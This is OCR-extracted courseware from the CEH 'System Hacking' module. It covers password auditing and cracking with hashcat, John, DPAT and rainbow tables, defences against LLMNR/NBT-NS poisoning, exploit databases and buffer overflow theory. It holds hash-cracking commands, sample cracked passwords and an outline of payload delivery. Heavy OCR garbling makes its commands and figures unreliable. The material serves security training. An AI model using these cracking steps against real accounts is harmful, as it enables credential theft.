Exam 312-50 Certified Ethical Hacker
Step 3: Create a password crack file in the format supported by the DPAT tool. The DPAT tool supports the file formats of both hashcat and John the Ripper tools. Run the following command to crack LM hashes of users .ntds in the hashcat.pot format: ./hashcat.bin
-m
3000
-a
3
users.ntds
-1
?a
217127127121271271
—-
increment
To crack LM hashes using John the Ripper, run the following command: john
=
--format=LM
Step 4: Now, run available options.
users.ntds
the
@parrc #./dpat.py -h lusage: dpat.py [-h] -n NTDSFILE [-g [GROUPLISTS
DPAT
script with
-h
or
-c CRACKFILE [-o OUTPUTFILE]
...]]
[-m]
--help
arguments
[-d REPORTDIRECTORY]
to view
all the
[-w] [-s]
This script will perform a domain password audit based on an extracted NTDS file and password cracking output such as Hashcat optional
arguments:
-h, --help n NTDSFILE,
show this help message and exit --ntdsfile NTDSFILE NTDS file name (output from SecretsDump. py) -c CRACKFILE, --crackfile CRACKFILE Password Cracking output in the default form output by Hashcat, such as hashcat.potfile 0 OUTPUTFILE, --outputfile OUTPUTFILE The name of the HTML report output file, defaults to DomainPasswordAuditReport .html d REPORTDIRECTORY, --reportdirectory REPORTDIRECTORY Folder containing the output HTML files, defaults to DPAT Report -w, --writedb Write the SQLite database info to disk for offline inspection instead of just in memory. Filename will be "pass audit.db" , --Sanitize Sanitize the report by partially redacting passwords and hashes. Prepends -g [GROUPLISTS
...],
the report directory with "Sanitized - " --grouplists [GROUPLISTS ...]
The name of one or multiple files that contain lists of usernames in particular groups. The group names will be taken from the file name itself. The
username
list
must
be
in
the
same
format
as
found
in
the
NTDS
e
such
as some.ad.domain.com\username or it can be in the format output by using the PowerView Get-NetGroupMember function. Example: -g "Domain Admins. txt"
Figure 6.26: Screenshot of the dpat.py script running with the -h option =
Step 5: Next, execute the DPAT script dpat.py with users.ntds as inputs. dpat.py
-n
customer.ntds
-c
and hashcat.pot
hashcat.pot
-n > Represents hashes extracted from the domain controller (DC) -c > List of cracked passwords generated using the hashcat tool As shown in the screenshot, the output of the above command clickable options, which can be opened in the default browser.
Module 06 Page 635
is an HTML report with
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Count 88803 $8023 69300 68521 78.0 778 36 26 8 6 227 226 6
Exam 312-50 Certified Ethical Hacker
Description More Info Password Hashes Details Unique Password Hashes Passwords Discovered Through Cracking Unique Passwords Discovered Through Cracking Percent of Passwords Cracked Details Percent of Unique Passwords Cracked Details ‘Members of "Domain Admins” group Details "Domain Admins” Passwords Cracked Details Members of "Enterprise Admins" group Details "Enterprise Admins” Passwords Cracked Details LM Hashes (Non-blank) Unique LM Hashes (Non-blank) Passwords Only Cracked via LM Hash Details Unique LM Hashes Cracked Where NT Hash was Not Cracked Password Length Stats Details Top Password Use Stats Details Password Reuse Stats Details Password History
Details
Figure 6.27: Screenshot of the DPAT report in an HTML format
=
Step 6: Now, click on the Details option to view more information about different passwords. For example, click on the Details option next to Password History to view the history of previously used passwords, as shown in the screenshot.
Username |Current Password| Carrie PringlesSalt! Curly Baseball77 Darin Black"Hills | Larry Fall2019 Mo dpat Fall2019 pope Proverbs3:5 _|
History0 | 'EatPringles Baseball76 | Black®Hills | Summer2019 | Zodiak-Cancer
History1 |
History2 History 3 | History 4 Iluv my kids! | New Job! Baseball75 | Baseball74 | Baseball73 | Baseball72 BlackSHills | Black#Hills | Black@Hills | Black!Hills Spring2019 Fall2018 | Spring2018 Zodiak-Taurus | Zodiak-Pisces
Philippians 4:6 | Romans 8:28 | Philippians 4:13 | Jeremiah 29:11] John 3:16
Figure 6.28: Screenshot of the password history in the DPAT report
Module 06 Page 636
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
CEH
Password-Cracking Tools: LOphtCrack and ophcrack LophtCrack
|
LOphtCrackis a tool designed to audit x\-words and recover epplications
Ls
ophcrack
PP!
ophcrack is a Windows password cracker based | onrainbow tables. It comes with a Graphical User Interface and runs on multiple platforms
»nobavoeOoAa
‘ttes//atan com
ce
‘ete fopherock sourceforge net
Password-Cracking Tools RainbowCrack
| rainbowtables.|t uses a time-memory
somes nt of DOSSD067 cde eRe
https://www.openwall.com
tradeoff algorithmto crack hashes
1 rantoncrck Fe Edt View Ranbow Tile tip Hash Plane Er arctnarcaesaricsad7ct88cd (i stastnareoessb7aesoTeoe0890 [1 stasetnaesess17ies9s7e0e089-0
=
John the Ripper
RainbowCrack cracks hashes with
Planeta Hox
a
x
hashcat ttps://hasheat.net
Comment Aerator const Defetecout
y
ito
&
THC-Hydra
[eq]
Medusa
fe
=o]
Til foroject ranbowcrock com
htps//githab.com
ihttp://foofus.net
Secure Shell Bruteforcer
‘ttps://aithub.com
Password-Cracking Tools Password-cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, it even allows users instant access to their locked computer without reinstalling Windows. Attackers can use password-cracking tools to crack the passwords of the target system.
Module 06 Page 637
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Some password-cracking tools are listed as follows.
=
LOphtCrack Source: https://gitlab.com LOphtCrack is a tool designed to audit passwords and recover applications. It recovers lost Microsoft Windows passwords with the help of a dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password. As shown
in the screenshot,
attackers use LOphtCrack to crack the password
target to gain access to the system. SF LophtCrack 7 - v7.2.0 Win64 [Unnamed Session]
of the
°
SEAE7DFAO7sDAGEEAAEFiFAAZBBDEOTE ocnese3908F7975F2A02007573B09697 a2pn0p252A47sreascorszi7spsasesaF 929 7S4sB519016241NzaF72¢60904rF
Figure 6.29: Screenshot of LOphtCrack
Module 06 Page 638
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
ophcrack
Source: http://ophcrack.sourceforge.net ophcrack is a Windows password-cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface (GUI) and runs on different OSs such as Windows, Linux/UNIX, etc. As shown in the screenshot, attackers use ophcrack to perform brute-force attacks and crack password hashes of the target system. -
@ opherack
yveoe”d Tables Crack Help Exit
aLoad
6 Delete
&Save
Progress
Statistics
Preferences
User ‘Administrator Guest DefaultAccount ‘Admin Martin Jason Shiela
LM Hash
NT Hash 31D6CFEODI6A... 31d6cfeOd162e8... 31d6cfedd1 6208... 9293794585188... SEBETDFAO7AD... 20200252A479F.. 08694880579...
Table
Status
Preload
LM Pwd 1
LM Pwd 2
NT Pwd
Progress
inactive
100% iM
@ table2
inactive
100% ry RAM
@ tables Preload:
done
inactive inactive inactive
x
Lod About
Y @ Vista free
@ tabled @ tablet
ao
100% in RAM 100% in RAM 100% in RM Brute force:
cc! done
Pwd found:
67
| Time elapsed:
Oh Sm 425
J
Figure 6.30: Screenshot of ophcrack
Module06 Page 639
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
RainbowCrack Source: http://project-rainbowcrack.com RainbowCrack cracks hashes with rainbow tables, using a time-memory trade-off algorithm. A traditional brute-force cracker cracks hash in a manner that is different from that followed by a time—memory-tradeoff hash cracker. The brute-force hash cracker tries all possible plaintexts one after the other during cracking. In contrast, RainbowCrack pre-computes all the possible plaintext hash pairs in the selected hash algorithm, charset, and plaintext length in advance and stores them in a “rainbow table” file. It may take a long time to pre-compute the tables, but once the pre-computation is finished, it is possible to easily and quickly crack the ciphertext in the rainbow tables. As shown in the screenshot, attackers use RainbowCrack to crack the password hashes of the target system. 8 RainbowCrack File
Edit
View
RainbowTable
a
x
Help
Hash
Plaintext
Plaintext in Hex
3id6cfe0d16ae931b73c59d7e0c089c0
Comment Administrator
}1 d6cfe0d16ae931b73c59d7e0c089c0:
Guest
© 31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount
92937945b51881434 1de3f726500d4fF
Admin.
Sebe7dfal74da8ee8aeflfaa2bbde876
apple
6170706c65
Martin
}d20d252a479H485cdfSe171d93985bf
qwerty
717765727479
Jason
test
74657374
Shiela
I) Ocb69488051797b!2a82807973b89537
«
Messages plaintext of 242025224794 85cdfSe171d93985bf is qwerty statistics
plaintext found: total time time of chain traverse time of alarm check: time of disk read:
30f4 11.058 411s 677s 064s
hash & reduce calculation of chain traverse: 11510400 hash & reduce calculation of alarm check: 34352770
number of alarm: 55343 performance of chain traverse: 2.80 million/s performance of alarm check: 5.08 million/s
Figure 6.31: Screenshot of RainbowCrack
Some password-cracking tools are listed as follows: John the Ripper (https://www.openwall.com)
hashcat (https://hashcat.net) THC-Hydra (https://github.com)
Medusa (http://foofus.net) Secure Shell Bruteforcer (https://github.com)
Module 06 Page 640
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Password Salting
CE H
‘@
Password salting is a technique where a random string of characters are added to the password before calculating their hashes
©
Advantage: Salting makes it more difficult to reverse the hashes and defeat pre-computed hash attacks
Alice:root:b4ef21{3ba4303ce24a83fe0317608de02bf38d)
«---
Same password but different hashes due to
Bob:root:a9c4fa:3282abd0308323ef0349dc7232c349ac Cecil:root:209be1 fa483b303c23af34761de02be038fde08|
different salts
“
Note: Windows password hashes are not salted
Password Salting Password salting is a technique in which random strings of characters are added to a password before calculating the hashes. This makes it more difficult to reverse the hashes and helps in defeating pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters. In cryptography, a “salt” consists of random data bits used as an input to a one-way function, the other being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A salt combines with a password by a key derivation function to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password, which renders password cracking
difficult.
Alice:root:b4ef2143ba4303ce24a83fe0317608de02bf38d } Computer Configuration > Administrative Templates > Network > DNS Client
@ Inthe DNS client, double-click on Turn off multicast name resolution © Select the Enabled radio button and then click OK
a
Open the Control Panel and navigate to Network and Internet >
Network and Sharing Center and click on Change adapter settings option present on the right side Right-click on the ° adapter and click
network | “**"*!1P/? Sear
Properties, select TCP/IPv4.
and then click Properties @ Under the General tab, go to Advanced > WINS @
From the NetBIOS setting
options, check “Disable
*
Penne 06 ms
6 te nee oa
TGabewased
t
a
Bene yrestsiae ios sera ete
pot uvess.
NetBIOS over TCP/IP”
radio button and click OK
How to Defend against LLMNR/NBT-NS
Poisoning
The easiest way to prevent a system from being attacked by a perpetrator is to disable both the LMNR and NBT-NS services in the Windows OS. Attackers employ these services to obtain user credentials and gain unauthorized access to the user’s system. Steps to disable LLMNR/NBT-NS in any version of Windows: =
Disabling LMBNR
o
Open the Local Group Policy Editor.
©
Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client.
o
Inthe DNS Client, double-click Turn off multicast name resolution.
o
Select the Enabled radio button and then click OK.
Module 06 Page 645
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
& Tum off multicast name resolution
o
EE] Tum off multicast name resolution
ONot Configured
pote Sette
Comment:
Supported on: Options:
x
pt least Windows Vista Help: Specifies that link local multicast name resolution (LLMNR) is disabled on client computers.
'
LLMNNR is a secondary name resolution protocol. With LLMNR, queries are sent using multicast over a local network link on a single subnet from a client computer to another client computer on the same subnet that also has LLMNR enabled. LLMNR does not require a DNS server or DNS client configuration, and provides name resolution in scenarios in which conventional DNS name resolution is not possible. If you enable this policy setting, LLMINR will be disabled on all available network adapters on the client computer. If you disable this policy setting, or you do not configure this policy setting, LLMNR will be enabled on all available network adapters.
Figure 6.33: Disabling LMBNR in Windows
=
Disabling NBT-NS o
Open the Control Panel, navigate to Network and Internet > Network and Sharing Center, and click on the Change adapter settings option on the right-hand side.
o
Right-click on the network adapter and then click Properties, select TCP/IPv4, and then click Properties.
o
Under the General tab, go to Advanced > WINS.
o
From the NetBIOS setting options, check the “Disable NetBIOS over TCP/IP” radio button and click OK.
Module 06 Page 646
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Advanced TCP/IP Settings
IP Settings DNS
x
WINS
WINS addresses, in order of use:
IF LMHOSTS lookup is enabled, it applies to all connections for which TCP/IP is enabled. @ Enable LMHOSTS lookup
Import LMHOSTS...
NetBIOS setting ObDefault:
Use NetBIOS setting from the DHCP server. If staticIP address
is usedor the DHCP server does not provide NetBIOS setting, enable NetBIOS over TCP/IP.
O
Enable NetBIOS
TCP/IP
a Figure 6.34: Disabling NBT-NS in Windows
Some additional countermeasures to defend against LLMNR/NBT-NS poisoning are as follows: Control LLMNR, NBT-NS, and mDNS traffic using host-based security tools.
Implement SMB signing to prevent relay attacks. Deploy an LLMNR/NBT-NS spoofing monitoring tool. Monitor the host on UDP ports 5355 and 137 for LLMNR and NBT-NS traffic. Monitor
attacks.
Monitor
specific event
any
IDs such
changes
as 4697
made
to
and
7045,
the
DWORD
HKLM\Software\Policies\Microsoft\Windows
Module 06 Page 647
which
can
be indicators
registry
of relay
located
in
NT\DNSClient.
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools to Detect LLMNR/NBT-NS Poisoning Vindicate @
Vindicate is an LLMNR/NBNS/mDNS Spoofing Detection
spoofing
Toolkit to detect name
service
Respounder
© Respounder helps security professionalsto detect rogue hosts running responder on public Wi-Fi networks ‘etes:/fathub.com Al RightsReserved. Reproduction
Tools to Detect LLMNR/NBT-NS
Poisoning
Network administrators and cybersecurity professionals use tools such responded, and Respounder to detect LLMNR/NBT-NS poisoning attacks. =
as Vindicate,
got-
Vindicate
Source: https://github.com Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network administrators. Security professionals use this tool to detect name service spoofing. This tool helps them to quickly detect and isolate attackers on their network. It is designed to detect the use of hacking tools such as Responder, Inveigh, NBNSpoof, and Metasploit’s LLMNR, NBNS, and mDNS spoofers while avoiding false positives. It exploits the Windows event log for quick integration with an Active Directory network.
Module 06 Page 648
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Figure 6.35: Screenshot showing the output of Vindicate =
Respounder
Source: https://github.com Respounder detects the presence of a responder in the network. Security professionals use this tool to identify compromised machines before hackers exploit password hashes. This tool also helps security professionals to detect rogue hosts running responder on public Wi-Fi networks, e.g., in airports and cafes and avoid joining such networks. attacker@parrot
$./respounder
/
1 ] ) (
[etho] Sending attacker@parrot
|// RESPOUNDER //|
,
probe
from
:
10.10.1.13...
responder
detected
at
10.10.1.9
Figure 6.36: Screenshot showing output of Respounder
Module 06 Page 649
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
got-responded
Source: https://github.com got-responded helps security professionals to check for LLMNR/NBT-NS spoofing. This tool starts in the default mode and checks for both LLMNR and NBT-NS spoofing but
does not send fake SMB credentials.
Author:
@_w_m_
:49
49
INFO INFO
sending
:49
5
INFO
07-11
04:55
verification
INFO
using
detectNBNSSpoof:
Spoofing
Going
sending
04:55 INFO 10.10.10.11
started
detectNBNSSpoof:
INFO
5 INFO
-10.11,
Detection
a
Got
verification
SRVDBJOYZ
detected
silent
Got
for
response
after
2s
360s,
don't
want
Got
a response
detectNBNSSpoof:
Got
verification
Spoofing
using
detected
SRVFILE-FSUJ using
by ip 10.10.10.11!,
detectNBNSSpoof: verification
for
RECEPTION-JNPO
for
to
10.1
from
10.
going dark for
360s
WORKSTATION-TF74
from
spam
after
using
by ip 10.10.10.11!,
SRVDBJOYZ
from
the
responder
10s
RECEPTION-JNPO
going
dark
for
fro
300s
Figure 6.37: Screenshot showing the output of got-responded
Module 06 Page 650
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Vulnerability Exploitation ‘@
CE H
Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to
a remote system. The steps involved are as follows:
Ea
©oeoe0ood
@
identify the vulnerability
Determine the risk associated with the vulnerability Determine the capability of the vulnerability es
Develop the exploit
aKQ
Select the method for delivering— local or remote
Generate and deliver the payload Gain remote access
Copyright © by
Vulnerability Exploitation Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. Attackers can perform exploitation only after discovering vulnerabilities in that target system. Attackers use discovered vulnerabilities to develop exploits and deliver and execute the exploits on the remote system. Steps involved in exploiting vulnerabilities: 1.
Identify the Vulnerability Attackers identify the vulnerabilities that exist in the target system using various techniques discussed in the previous modules. These techniques include footprinting and reconnaissance, scanning, enumeration, and vulnerability analysis. After identifying the OSs used and vulnerable services running on the target system, attackers also use various online exploit sites such as Exploit Database (https://www.exploit-db.com) and Packet Storm (https://packetstormsecurity.com) to detect vulnerabilities in underlying OS and applications.
2.
Determine the Risk Associated with the Vulnerability After identifying a vulnerability, attackers determine the risk associated with the vulnerability, i.e., whether exploitation of this vulnerability sustains the security
measures on the target system.
3.
Determine the Capability of the Vulnerability If the risk is low, attackers can determine the capability of exploiting this vulnerability to
gain remote access to the target system.
Module 06 Page 651
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking 4.
Exam 312-50 Certified Ethical Hacker
Develop the Exploit After determining the capability of the vulnerability, attackers use exploits from online exploit sites such as Exploit Database (https://www.exploit-db.com), or develop their own exploits using exploitation tools such as Metasploit.
5.
Select the Method for Delivering — Local or Remote Attackers perform remote exploitation over a network to exploit vulnerability existing in the remote system to gain shell access. If attackers have prior access to the system, they perform local exploitation to escalate privileges or execute applications in the target
system. 6.
Generate and Deliver the Payload Attackers, as part of exploitation, generate or select malicious payloads using tools such as Metasploit and deliver it to the remote system either using social engineering or through a network. Attackers inject malicious shellcode in the payloads, which, when executed, establishes a remote shell to the target system.
7.
Gain Remote Access
After generating the payload, attackers run the exploit to gain remote shell access to the target system. Now, attackers can run various malicious commands on the remote shell and control the system.
Module 06 Page 652
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Exploit Sites
|
‘eps fiw. S162. com
ete: /fulio.com
oe
Bs
CVE res reso peat re ton eee
er
‘Search Results
Exploit Sites Attackers can use various exploit sites such as Exploit Database, VulDB, etc. to discover vulnerabilities and download or develop exploits to perform remote exploitation on the target system. These sites include details of the latest vulnerabilities and exploits.
=
Exploit Database Source: https://www.exploit-db.com Exploit Database includes details of the latest vulnerabilities present in various OSs, devices, applications, etc. Attackers can search Exploit Database to discover vulnerabilities in that target system, download the exploits from the database, and use exploitation tools such as Metasploit to gain remote access.
Module 06 Page 653
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
6
verified
Has App
10
=
Bypass)
oat
05
~
Buffer Overflow (DoS)
is
™ sa
cl me
Figure 6.38: Screenshot of Exploit Database
=
VulDB
Source: https://vuldb.com VuIDB includes details of the latest vulnerabilities and exploits, rated based on the highest exploitation probability. Attackers can search the VulDB to identify vulnerabilities and exploit them or even fully automate the exploitation.
HOME
ENTRIES
RISK
fase 017112022
THREAT
SEARCH = SUPPORT
Temp: ~ Vulnerability
EEE MIRE
LOGIN
Prod: Exp: = Rem: = Connection Manager Privilege SEE
icros t windows Remote access Connection Manager Privilege EEE onnection Manager Privilege EEE
ovnvvasz
dows Remat
01/05/20:
Secure Remote Access Base Software cross-site
1271472021 ranaya0a1 1171772021
cml
ZEN
EEN WIRED
wicrost windows Remote Access Privilege Escalation = Windows Remote Access Connection Manager Privilege SEE Escalator HREM MIREIMI.zon0 Remote Ac es Pus Server Password Reset password = Remote Ac oho Remote Ac
ti
=a =
no ManageEngine Rem Plus random values = Engine Remote Access Pls resetPWOxmi hard-coded EEE
Figure 6.39: Screenshot of VulDB
Module 06 Page 654
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Vulners Source: https://vulners.com Vulners.com is a security database containing descriptions for a large amount of software vulnerabilities in a machine-readable format. Cross-references between bulletins and continuously updating databases helps one keep abreast of the latest security threats. DATABASE
PRODUCTS +
PRICING
STATS
BLOG
DOCS
CONTACTS
GET STARTED
x
bulletinFamily:unix order:published
@ vaice) G security news) ©] exper epdates) GS wioysreviw) 3
Linux
(@ wushouny)
kernel vulnerabilities
1022-04-01
(Q umurvawrsiice) (G scarnerspl cvss 7.2
00:00:00
5
#
cvsss 7.0
It was discovered that the VFIO PCI driverin the Linux kernel did not properly handle attempts to access disabled memory spaces. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-12888) Mathy Vanhoef discovered that t.
eo Linux kernel (Intel |OTG) vulnerabilities
808
ovss 7.8
B® cvss3 8.4
Nick Gregory discovered that the Linux kernel incorrectly handled network offload functionality. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-25636) Enrico Barberis, Pietro Frigo, Marius Muench.
©: 8 ©e
[SECURITY] [DLA 2967-1] wireshark security update 1022-03-31 21:42:51
ovss 7. © °
B
©
@ support
Figure 6.40: Screenshot of Vulners
Module 06 Page 655
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking =
MITRE CVE
Source: https://www.cve.org MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target
system.
commen Wuinerabilties and Exposures
Search CVE List
Download CVE
Data Feeds
Request CVE IDs
CVE Entry
TOTAL CVE Entries: 119927
Search Results
[There are 10111 CVE entries that match your search.
Name
Description
CVE-2019-9956
—_In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-9928
GStreamer
CVE-2019-9895 CVE
9810
CVE-2019-9773
before
1.16.0
has a heap-based
buffer overflow
in the RTSP
connection
crafted response from a server, potentially allowing remote code execution.
parser via a
_In PUTTY versions before 0.71 on Unix, a remotely triggerable buffer overflow exists in any kind of server-to-client forwarding. _ Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1. An issue was discovered in GNU LibreDWG 0.7 and 0.7.1645. There is a heap-based buffer
5
Figure 6.41: Screenshot of MITRE CVE
Module 06 Page 656
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Buffer Overflow
CE H
@ Abuffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data ‘©
Buffer overflow or overrun is a common vulnerability in an applications or programs that accepts more data than
the allocated buffer
© This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations @ Attackers exploit buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, etc. Why Are Programs and Applications Vulnerable to Buffer Overflows?
© Lackof boundary checking
© Failingto set proper filteringand validation principles
© Using older versions of programming languages
© Executing code present in the stack segment
© Using unsafe and vulnerable functions
© Impropermemory allocation
© Lack of good programming practices
© Insufficientinputsanitization
Buffer Overflow A buffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data. Buffer overflow or overrun is a common vulnerability in applications or programs that accept more data than the allocated buffer. This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations. Furthermore, this vulnerability leads to erratic system behavior, system crash, memory access errors, etc. Attackers exploit a buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, and so on. Why Are Programs and Applications Vulnerable to Buffer Overflows? =
Boundary checks are not performed fully, or, in most cases, entirely skipped
=
Applications that use older versions of programming languages involve several vulnerabilities
=
Programs that use unsafe and vulnerable functions fail to validate the buffer size
=
Programs and applications that do not adhere to good programming practices
=
Programmers that fail to set proper filtering and validation principles in the applications
=
Systems that execute code present in the stack segment are vulnerable to buffer
=
Improper memory allocation and insufficient input sanitization in the application lead to buffer overflow attacks
=
Application programs that use pointers for accessing heap memory result in buffer
overflows
overflows
Module 06 Page 657
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Types of Buffer Overflow: Stack-Based Buffer Overflow |@
CE H
Astack is used for static memory allocation and stores the variables in “Last-in First-out” (LIFO) order There are two stack operations: PUSH stores the data onto the stack and POP removes data from the stack
ih fan application is vulnerableto stack-based buffer overflow, then attackers take control of the EIP register to replace tl he
@
return address of the function with the malicious code that allows them to gain shell access to the target system Bottom of Stack
Bottom of Stack
Data on stack Segment SP
EndofStack
Bottom of Stack
Data on Stack Segment | |ABytes
Dataon stack | semedsta Segment oerten
Return Address || @Bytes | New Return Address.»
ayes,
MoreDataon Stack Segment
SP“>
End of Stack
‘ANormal Stack
ESP (Extended Stack Pointer) > Stack Frame
‘Stack when Attacker calls a function
| new nBytes+ data SP->
Overwrtten Data onstack Segment
Buffer Space
v
Maus bsyaycde
End of Stack
EBP (Extended Base Pointer)
Stack when attacker overflows buffer in function
EP
yore
tosmash the stack
Types of Buffer Overflow: Heap-Based Buffer Overflow ‘@
1n Pointer)> Return Address
CEH
Heap memory is dynamically allocated at runtime during the execution of the program and it stores program
data
|@ Heap-based overflow occurs when a block of memory is allocated to a heap, and data is written without any bounds checking @ This vulnerability leads to overwriting dynamic object pointers, heap headers, heap -based data, virtual function table, etc. |@ Attackers exploit heap-based buffer overflow to take control of the program’s execution. Unlike stack overflows, heap overflows are inconsistent and have different exploitation techniques
input=malloc(20);
} input=malloc(20};
Heap:
E output=malloc(20);
Before Overflow Al Rights Reserved. Reproduction i Strictly Prohibited
Types of Buffer Overflow There are two types of buffer overflow, namely the stack-based based buffer overflow. =
buffer overflow and heap-
Stack-Based Buffer Overflow In most applications, a stack is used for static memory allocation. Contiguous blocks of memory are allocated for a stack to store temporary variables created by a function.
Module 06 Page 658
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
The stack stores the variables in “Last-in First-out” (LIFO) order. Whenever a function is called, the required memory for storing the variables is declared on the stack, and when the function returns, the memory is automatically deallocated. There are two stack operations, namely, PUSH, which stores data onto the stack, and POP, which removes data from the stack. Stack memory includes five types of registers: o
BP: Extended Base Pointer (EBP), also known the first data element stored onto the stack
as StackBase, stores the address of
o
ESP: Extended Stack Pointer (ESP) stores the address of the next data element to be stored onto the stack
o
EIP: Extended Instruction Pointer (EIP) stores the address of the next instruction to
o
ESI:
be executed
Extended
Source
Index
(ESI)
maintains
the
source
index
for various
string
operations
o
EDI: Extended Destination Index (EDI) maintains the destination index for various string operations
A stack-based buffer overflow occurs when an application writes more data to a buffer than what is actually allocated for that buffer. To understand stack-based buffer overflow, you must focus on the EBP, EIP, and ESP registers. EIP is the most important read-only register, which stores the address of the instruction that needs to be subsequently executed. ESP (Extended Stack Pointer) > Stack Frame
Buffer Space
EBP (Extended Base Pointer) EIP (Extended Instruction Pointer) > Return Address Figure 6.42: Representation of stack
Whenever a function starts execution, a stack frame that stores its information is pushed onto the stack and stored in the ESP register. When the function returns, the stack frame is popped out from the stack and the execution resumes from the return address stored on the EIP register. Hence, if an application or program is vulnerable to buffer overflow attack, then attackers take control of the EIP register to replace the
Module 06 Page 659
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
return address of the function with malicious code that allows them to gain shell access to the target system. Bottom of Stack
Bottom of Stack
Bottom of Stack
Data on Stack Segment
Data on Stack Segment
Data on Stack Segment
SP-->
End of Stack
4 Bytes
Return Address
4Bytes
n Bytes
More Data on
nBytes+
sP-> ANormal Stack
new data
Stack Segment End of Stack
SP-->
Stack when Attacker calls a function
Some gata owerwaitten
New Return Address
— Overwritten Data
on Stack Segment
Malicious Code.
bee Fa nysh)
End of Stack Stack when attacker
overflows buffer in function to smash the stack
Figure 6.43: Demonstration of stack-based buffer overflow
=
Heap-Based Buffer Overflow
